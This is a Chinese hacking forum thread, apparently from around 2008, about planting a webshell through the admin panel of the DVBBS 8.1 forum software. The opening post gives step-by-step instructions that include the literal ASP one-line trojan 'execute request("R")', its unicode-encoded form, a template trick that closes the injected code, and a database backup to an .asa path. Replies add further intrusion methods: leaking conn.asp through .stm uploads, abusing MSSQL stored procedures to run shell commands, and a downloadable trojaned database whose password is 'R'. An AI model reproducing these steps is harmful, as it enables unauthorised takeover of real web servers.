[讨论]DVBBS8.1 的后台另类拿WEBSHELL方法 WEBSHELL, 后台, 另类, 讨论

valen886

[讨论]DVBBS8.1 的后台另类拿WEBSHELL方法
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
议题作者：我爱一条柴


本方法非本人原创，只不过亲手测试了一下，替原作者改正了一些地方，完善了一下。原作者：明生KISS


在Dv_Admin表名，即在新增的管理员用户名中，插入“┼攠數畣整爠煥敵瑳∨≒┩眾┼砧”用户名，当然你需要事前要注册一个前台用户,如XXXXX用户，再在后台用来被指定为管理员，指定名称就插入值“<% execute request("R")%>w<%&#39;x”unicode压缩后的代码“┼攠數畣整爠煥敵瑳∨≒┩眾┼砧”，

再将“闭合内容”代码插入[风格界面]------------[模板名称]--------当中
“闭合内容”为: “┧眾”
  原文: “&#39;%>”unicode压缩后的代码，

然后，备份数据库，备份目录假设为http://www.sb.com/bbs2/asa.asa\x.mdb


这样就成功了，你拿一句话马客户端直接连接，就可以写入大马！

适用版本：动网论坛 Access数据库 Dvbbs 8.1.1
系统环境：win2003+IIS6.0

简单说下思路，就是利用动网数据库格式，人为闭合方数据库下载表的内容，让插在DV_admin处的一句话马正常解析！比上次某人说的那个伪造数据库文件覆盖再备份要安全的多，起码不用损坏论坛数据库！

再一次感谢明生KISS兄的另类思路！
帖子31 精华0 积分105 阅读权限40 性别男 在线时间83 小时 注册时间2006-10-21 最后登录2008-4-2 查看详细资料TOP 让女孩一夜变的更有女人味

mlove
mlove

M58540

提示: 作者被禁止或删除 内容自动屏蔽
帖子20 精华0 积分-6 阅读权限0 性别男 来自邪恶八进制 在线时间8 小时 注册时间2008-1-8 最后登录2008-4-7 查看详细资料TOP 您知道您年薪应是多少?

我爱一条柴
晶莹剔透§烈日灼然

binfengbin

我在测试时用模板试过，提示缺少LOOP语句，明生KISS当时也说模板可以的，可我就是没测试成功。不知道其他人有没有测试过
帖子31 精华0 积分105 阅读权限40 性别男 在线时间83 小时 注册时间2006-10-21 最后登录2008-4-2 查看详细资料TOP 您知道您年薪应是多少?

ysjynb
晶莹剔透§烈日灼然

claire87

http://hack.77169.com/HTML/20080113021910.html
我写的你可以参考看看
帖子5 精华0 积分20 阅读权限40 性别男 在线时间27 小时 注册时间2007-2-12 最后登录2008-7-10 查看详细资料TOP

我爱一条柴
晶莹剔透§烈日灼然

linda_981

引用:
引用第3楼ysjynb于2008-01-21 10:20发表的 :
http://hack.77169.com/HTML/20080113021910.html
我写的你可以参考看看
看了！有个疑问
方法三：stm文件爆文件内容
这步有点疑问，上传stm好像是为了暴出CONN.ASP的源码，好像主要是为了MSSQL版本的？找连接用户名和密码？还不如直接拿压缩数据库功能直接压缩conn.asp得了,一样可以看源码。不知道是不是你的方法还有其他含义？请教
帖子31 精华0 积分105 阅读权限40 性别男 在线时间83 小时 注册时间2006-10-21 最后登录2008-4-2 查看详细资料TOP 让女孩一夜变的更有女人味

ysjynb
晶莹剔透§烈日灼然

Hemry

看来你没看懂动网8.1的压缩数据库功能代码~它压缩的文件固定就是默认数据库不可改动
不然你早就能备份得WEBSELL了,上传STM是为了多一条拿站的道路,当然也可用MSSQL
我看论坛里还有一个拿站的方法也不错,上传数据库.TXT恢复备份,不过速度要快
session时间一过，你就死定了。呵呵
帖子5 精华0 积分20 阅读权限40 性别男 在线时间27 小时 注册时间2007-2-12 最后登录2008-7-10 查看详细资料TOP 让女孩一夜变的更有女人味

ly7666255
晶莹剔透§烈日灼然

cartoon

成功了!多谢仗剑独走天涯，试问谁与争锋!

帖子3 精华0 积分13 阅读权限40 性别男 来自安徽舒城 在线时间4 小时 注册时间2007-6-27 最后登录2008-7-14 查看个人网站
查看详细资料TOP 让女孩一夜变的更有女人味

我爱一条柴
晶莹剔透§烈日灼然

粤北人

引用:
引用第5楼ysjynb于2008-01-21 11:50发表的 :
看来你没看懂动网8.1的压缩数据库功能代码~它压缩的文件固定就是默认数据库不可改动
不然你早就能备份得WEBSELL了,上传STM是为了多一条拿站的道路,当然也可用MSSQL
我看论坛里还有一个拿站的方法也不错,上传数据库.TXT恢复备份,不过速度要快
session时间一过，你就死定了。呵呵
压缩数据库功能代码我没研究过，不过我测试过，压缩任何asp文件，都会提示错误，本目录下生成一个temp.mdb文件，下载回来后直接拿记事本打开就可以看源码了，我当时测试了8.0和8.1版本，都成功的。
http://www.cnhacker.com/bbs/read ... ;toread=&page=1
帖子31 精华0 积分105 阅读权限40 性别男 在线时间83 小时 注册时间2006-10-21 最后登录2008-4-2 查看详细资料TOP

ysjynb
晶莹剔透§烈日灼然

QQ小敏

借宝地请教一下。mssql  xp_subdirs这个存储过程 宿主是那个DLL
xpstar.dll odsole70.dll xplog70.dll odsole70.dll
拿站过程中需要录个目录 沙盒提要不支持 "Microsoft.Jet.OLEDB.4.0"
sp_oacreate &#39;wscript.shell&#39; 执行成功没加上用户~我用SQLTOOLS连接工具从注册表中看到不成功
（注得到MSSQL  SA用户可以执行EXEC sp_addextendedproc命令）
帖子5 精华0 积分20 阅读权限40 性别男 在线时间27 小时 注册时间2007-2-12 最后登录2008-7-10 查看详细资料TOP

ysjynb
晶莹剔透§烈日灼然

skylongo

sp_helptext &#39;xp_subdirs&#39; 呵呵用这条命令看到了xpstar.dll
帖子5 精华0 积分20 阅读权限40 性别男 在线时间27 小时 注册时间2007-2-12 最后登录2008-7-10 查看详细资料TOP

kissjetg
晶莹剔透§烈日灼然

qxkmay

摆了一个好大的乌龙~~~~~~~~~~~~~~~~~~~~~~

前几天发布了一个8.1后台拿shell教程..因为当初没有把好审核关.所以闹了一个喜剧...在这里先说对不起了...

不过在当天的研究确实除了.上一次那位牛人公布的admin拿shell方法之外.确信还有其他方法..证据.请大家下载这个数据库...

  http://www.abcxd.com/mm/8.1.mdb 这是动网的数据库.是那天晚上我做拿shell实验的实验品..

  下载回来之后把他改成asa用一句话连接..密码是:R  连上之后再看一下数据库..

因为我当初在模板插块时..然后把他改成asa时再用一句话连上的时候.确实成功了..

但是后来经过大家的测试之后。我再下载一个新的DVBBS8.1程序并在2003服务器进行测试时.却失败了..原来.在模板处并没有完全的闭合....是不知道我弄了什么东西搞得.一句话木马消失在数据库了...不信你可以下载上面的数据库.希望某位牛人给我答答...我今天晚上把他一个一个项目的找过了.也没找到我当初插的一句话马..但他就是能连上..郁闷呀...大家帮帮忙...找到了告诉我一声....谢谢你让我进步
帖子4 精华0 积分16 阅读权限40 性别男 在线时间5 小时 注册时间2007-6-24 最后登录2008-1-27 查看详细资料TOP

kking
晶莹剔透§烈日灼然

dongdg

引用:
引用第7楼我爱一条柴于2008-01-21 13:53发表的 :


压缩数据库功能代码我没研究过，不过我测试过，压缩任何asp文件，都会提示错误，本目录下生成一个temp.mdb文件，下载回来后直接拿记事本打开就可以看源码了，我当时测试了8.0和8.1版本，都成功的。
http://www.cnhacker.com/bbs/read ... ;toread=&page=1
又一个不看代码的，有什么资格去评论别人的方法，你知道为什么会提示错误么？

因为在进行操作前程序会用数据库引擎打开文件看看是否返回错误来判定是否为数据库格式，你知道 temp.mdb 文件干什么的么？其实还有个 temp2.mdb ，自己回去看代码吧。

拿站的方法多种多样，我只看重过程的突破与享受，而更多的人在乎结果是否可以卖个好价钱。
虽然我失败了，那是必然的，因为考虑不周，没有什么好说的，但纵然如此，DV的代码我已经全部读完了，程序中每一个细节我都非常清楚，而你呢？ 结果并不重要，任何CMS系统都存在漏洞，发现与否只是时间问题。http://www.vtwo.cn
帖子54 精华0 积分127 阅读权限40 性别男 在线时间25 小时 注册时间2006-10-9 最后登录2008-3-14 查看个人网站
查看详细资料TOP

我爱一条柴
晶莹剔透§烈日灼然

有来游去

引用:
引用第11楼kking于2008-01-22 16:47发表的 :


又一个不看代码的，有什么资格去评论别人的方法，你知道为什么会提示错误么？

因为在进行操作前程序会用数据库引擎打开文件看看是否返回错误来判定是否为数据库格式，你知道 temp.mdb 文件干什么的么？其实还有个 temp2.mdb ，自己回去看代码吧。
.......
无语！也许你说的对！不看代码分析也许永远都只能踩着别人的脚印走！
每个人的水平起点不一样吧！这个我有点无奈！有时间我会啃啃的！谢谢你的话！
帖子31 精华0 积分105 阅读权限40 性别男 在线时间83 小时 注册时间2006-10-21 最后登录2008-4-2 查看详细资料TOP

kissjetg
晶莹剔透§烈日灼然

bmw

摆了一个好大的乌龙~~~~~~~~~~~~~~~~~~~~~~

前几天发布了一个8.1后台拿shell教程..因为当初没有把好审核关.所以闹了一个喜剧...在这里先说对不起了...

不过在当天的研究确实除了.上一次那位牛人公布的admin拿shell方法之外.确信还有其他方法..证据.请大家下载这个数据库...

  http://www.abcxd.com/mm/8.1.mdb 这是动网的数据库.是那天晚上我做拿shell实验的实验品..

  下载回来之后把他改成asa用一句话连接..密码是:R  连上之后再看一下数据库..

因为我当初在模板插块时..然后把他改成asa时再用一句话连上的时候.确实成功了..

但是后来经过大家的测试之后。我再下载一个新的DVBBS8.1程序并在2003服务器进行测试时.却失败了..原来.在模板处并没有完全的闭合....是不知道我弄了什么东西搞得.一句话木马消失在数据库了...不信你可以下载上面的数据库.希望某位牛人给我答答...我今天晚上把他一个一个项目的找过了.也没找到我当初插的一句话马..但他就是能连上..郁闷呀...大家帮帮忙...找到了告诉我一声....谢谢你让我进步
帖子4 精华0 积分16 阅读权限40 性别男 在线时间5 小时 注册时间2007-6-24 最后登录2008-1-27 查看详细资料TOP

kking
晶莹剔透§烈日灼然

死性不改

引用:
引用第12楼我爱一条柴于2008-01-22 21:14发表的 :


无语！也许你说的对！不看代码分析也许永远都只能踩着别人的脚印走！
每个人的水平起点不一样吧！这个我有点无奈！有时间我会啃啃的！谢谢你的话！
说这话不是用来讽刺你的，加油吧，毕竟不看代码完全靠一些经验来进行检测只能寻找80%的漏洞，而20%的漏洞却偏偏隐藏在代码里，如果有时间还是多看看吧，ASP的代码还不算难，多半是VBS的，看到不清楚的函数方法就GOOGLE，肯定没问题的。http://www.vtwo.cn
帖子54 精华0 积分127 阅读权限40 性别男 在线时间25 小时 注册时间2006-10-9 最后登录2008-3-14 查看个人网站
查看详细资料TOP

゛小︷帅！﹊
晶莹剔透§烈日灼然

超越

看了3个网页，2种方法。

另个办法是Dv_TableList

帖子58 精华0 积分155 阅读权限40 来自杭州 在线时间152 小时 注册时间2007-9-29 最后登录2008-7-16 查看个人网站
查看详细资料TOP

我爱一条柴
晶莹剔透§烈日灼然

剑花江南

引用:
引用第15楼゛小︷帅！﹊于2008-01-24 08:00发表的 :
看了3个网页，2种方法。

另个办法是Dv_TableList
Dv_TableList？是伪造动网数据库插马再上传么？这样有风险的!
帖子31 精华0 积分105 阅读权限40 性别男 在线时间83 小时 注册时间2006-10-21 最后登录2008-4-2 查看详细资料TOP

hackest
运维管理组

ecc83

http://www.hackest.cn/read.php?71
仅供参考My Blog：http://www.hackest.cn/ [H.S.T]：http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP

゛小︷帅！﹊
晶莹剔透§烈日灼然